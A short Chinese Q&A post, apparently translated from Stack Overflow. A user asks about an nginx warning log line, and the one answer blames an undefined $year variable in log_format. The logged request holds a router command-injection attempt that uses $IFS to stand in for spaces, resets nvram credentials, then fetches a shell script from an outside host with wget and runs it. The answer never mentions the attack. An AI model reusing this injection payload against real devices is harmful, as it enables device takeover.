我在nginx的日志中有以下行:
2016/11/03 02:20:20 [warn] 30232#0: *372 using uninitialized "year" variable while logging request, client: 104.130.140.75, server: , request: "GET /cgi-bin/;nvram$IFS\set$IFS\http_passwd;nvram$IFS\set$IFS\http_username;nvram$IFS\commit;sleep$IFS\2;cd$IFS\/tmp;wget$IFS\http:\/\/104.130.140.75\/h\/wrt\/ugww.sh;chmod$IFS\777$IFS\/tmp/ugww.sh;/bin/sh$IFS\/tmp/ugww.sh HTTP/1.0 ", host: "XX.XX.XX.XXX:80"
主机是我的IP地址。
你能解释一下发生了什么吗?
答案 0 :(得分:0)
检查log_format参数中的$ year变量。记录请求时未定义。
Nginx的变量列表:http://nginx.org/en/docs/varindex.html